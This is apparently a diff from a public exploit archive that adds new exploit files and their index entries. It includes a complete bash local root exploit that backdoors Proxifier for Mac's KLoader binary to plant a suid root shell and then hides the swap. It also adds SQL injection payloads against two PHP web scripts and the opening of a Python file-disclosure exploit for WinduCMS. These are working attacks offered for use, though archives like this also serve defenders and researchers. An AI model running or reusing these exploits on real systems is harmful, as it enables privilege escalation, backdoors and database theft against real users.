2.19 is also vulnerable to a slightly different attack that +# yields the same result. +# +# When Proxifier is first run, if the KLoader binary is not suid root it gets +# executed as root by Proxifier.app (the user is prompted to enter an admin +# password). The KLoader binary will then make itself suid root so that it +# doesn't need to prompt the user again. +# +# The Proxifier developers added parameter sanitisation and kext signature +# verification to the KLoader binary as a fix for CVE-2017-7643 but Proxifier.app +# does no verification of the KLoader binary that gets executed as root. +# +# The directory KLoader sits in is not root-owned so we can replace it with +# our own binary that will get executed as root when Proxifier starts. +# +# To avoid raising any suspicion, as soon we get executed as root we can swap +# the real KLoader binary back into place and forward the execution call on +# to it. It does require the user to re-enter their credentials the next time +# Proxifier is run but it's likely most users wouldn't think anything of this. +# +# Users should upgrade to version 2.19.2. +# +# https://m4.rkw.io/proxifier_privesc_219.sh.txt +# 3e30f1c7ea213e0ae1f4046e1209124ee79a5bec479fa23d0b2143f9725547ac +# ------------------------------------------------------------------- + +#!/bin/bash + +##################################################################### +# Local root exploit for vulnerable KLoader binary distributed with # +# Proxifier for Mac v2.19 # +##################################################################### +# by m4rkw, shouts to #coolkids :P # +##################################################################### + +cat > a.c < +#include + +int main() +{ + setuid(0); + seteuid(0); + + execl("/bin/bash", "bash", NULL); + return 0; +} +EOF + +gcc -o /tmp/a a.c + +cat > a.c < +#include +#include +#include +#include + +int main(int ac, char *av[]) +{ + if (geteuid() != 0) { + printf("KLoader: UID not set to 0\n"); + return 104; + } else { + seteuid(0); + setuid(0); + + chown("/tmp/a", 0, 0); + chmod("/tmp/a", strtol("4755", 0, 8)); + rename("/Applications/Proxifier.app/Contents/KLoader2", "/Applications/Proxifier.app/Contents/KLoader"); + chown("/Applications/Proxifier.app/Contents/KLoader", 0, 0); + chmod("/Applications/Proxifier.app/Contents/KLoader", strtol("4755", 0, 8)); + execv("/Applications/Proxifier.app/Contents/KLoader", av); + + return 0; + } +} +EOF + +mv -f /Applications/Proxifier.app/Contents/KLoader /Applications/Proxifier.app/Contents/KLoader2 +gcc -o /Applications/Proxifier.app/Contents/KLoader a.c +rm -f a.c + +echo "Backdoored KLoader installed, the next time Proxifier starts /tmp/a will become suid root." \ No newline at end of file diff --git a/exploits/php/webapps/43213.txt b/exploits/php/webapps/43213.txt new file mode 100644 index 000000000..1a9c6ca48 --- /dev/null +++ b/exploits/php/webapps/43213.txt @@ -0,0 +1,26 @@ +# Exploit Title: FS Makemytrip Clone - SQL Injection +# Date: 2017-12-05 +# Exploit Author: Dan° +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/makemytrip-clone/ +# Version: 2017-12-05 +# Tested on: Kali Linux 2.0 + +(PoC): +SQL Injection on GET parameter = id +http://localhost/pages.php?id= + +--- +Parameter: id (GET) +Type: boolean-based blind +Title: AND boolean-based blind - WHERE or HAVING clause +Payload: id=1 AND 2990=2990 +Type: AND/OR time-based blind +Title: MySQL >= 5.0.12 OR time-based blind +Payload: id=1 OR SLEEP(5) +Type: UNION query +Title: Generic UNION query (NULL) - 4 columns +Payload: id=-4648 UNION ALL SELECT +NULL,NULL,CONCAT(0x716b767a71,0x47714f5a66644664796a6a426879674757634b707753727544424f616944536d4d70655276565854,0x7178627171),NULL-- +YbYU +--- \ No newline at end of file diff --git a/exploits/php/webapps/43214.py b/exploits/php/webapps/43214.py new file mode 100755 index 000000000..ca7a516b4 --- /dev/null +++ b/exploits/php/webapps/43214.py @@ -0,0 +1,36 @@ +#!/usr/bin/python +# +# Exploit Title: WinduCMS <= 3.1 - Local File Disclosure +# Date: 2017-12-03 +# Exploit Author: Maciek Krupa +# Vendor Homepage: http://windu.org +# Version: 3.1 +# Tested on: Linux Debian 9 +# +# // Description // +# +# Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here +# +# // PoC // +# +# It requires a contact form present on the website +# +# Example: {{W name=contactForm inputs="name" email="root@localhost"}} +# + +from requests_toolbelt import MultipartEncoder +import requests + +print("WinduCMS <= 3.1 Exploit") + +url = 'http://localhost/contact_page?mn=contactform.message.negative' +email = 'attacker@example.com' +payload = '= 5.0.12 AND time-based blind +Payload: token=2060a87ff679a2f3e71d9181a67b7542122c' AND SLEEP(5)-- aVZf + +Type: UNION query +Title: Generic UNION query (NULL) - 77 columns +Payload: token=-5886' UNION ALL SELECT +NULL,CONCAT(0x7162787171,0x6153755a46504d6a546578714d765a594a5359556c414f4d736c45444958686e4455564770526272,0x7170787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- +nVKG +--- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 480d2b5be..d80c475a6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9367,6 +9367,16 @@ id,file,description,date,author,type,platform,port 43187,exploits/windows/local/43187.txt,"Diving Log 6.0 - XML External Entity Injection",2017-11-27,"Trent Gordon",local,windows, 43192,exploits/win_x86/local/43192.c,"Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,win_x86, 43201,exploits/macos/local/43201.rb,"macOS High Sierra - Local Privilege Escalation (Metasploit)",2017-11-30,Metasploit,local,macos, +43216,exploits/macos/local/43216.rb,"Arq 5.9.7 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, +43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, +43218,exploits/macos/local/43218.sh,"Arq 5.9.6 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, +43219,exploits/macos/local/43219.sh,"Hashicorp vagrant-vmware-fusion 5.0.3 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, +43220,exploits/macos/local/43220.sh,"Hashicorp vagrant-vmware-fusion 5.0.1 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, +43221,exploits/macos/local/43221.sh,"Sera 1.2 - Local Privilege Escalation / Password Disclosure",2017-12-06,"Mark Wadham",local,macos, +43222,exploits/macos/local/43222.sh,"Hashicorp vagrant-vmware-fusion 5.0.0 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, +43223,exploits/macos/local/43223.sh,"Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, +43224,exploits/macos/local/43224.sh,"Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, +43225,exploits/macos/local/43225.sh,"Proxifier for Mac 2.19 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote (PoC)",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -38245,3 +38255,6 @@ id,file,description,date,author,type,platform,port 43210,exploits/windows/webapps/43210.txt,"Perspective ICM Investigation & Case 5.1.1.16 - Privilege Escalation",2017-12-05,"Konstantinos Alexiou",webapps,windows, 43211,exploits/php/webapps/43211.txt,"Techno Portfolio Management Panel - 'id' SQL Injection",2017-12-05,"Ihsan Sencan",webapps,php, 43212,exploits/php/webapps/43212.txt,"Readymade Classifieds Script 1.0 - SQL Injection",2017-12-05,"Ihsan Sencan",webapps,php, +43213,exploits/php/webapps/43213.txt,"FS Makemytrip Clone - 'id' SQL Injection",2017-12-06,Dan°,webapps,php, +43214,exploits/php/webapps/43214.py,"WinduCMS 3.1 - Local File Disclosure",2017-12-06,"Maciek Krupa",webapps,php, +43215,exploits/php/webapps/43215.txt,"FS Shaadi Clone - 'token' SQL Injection",2017-12-06,Dan°,webapps,php,80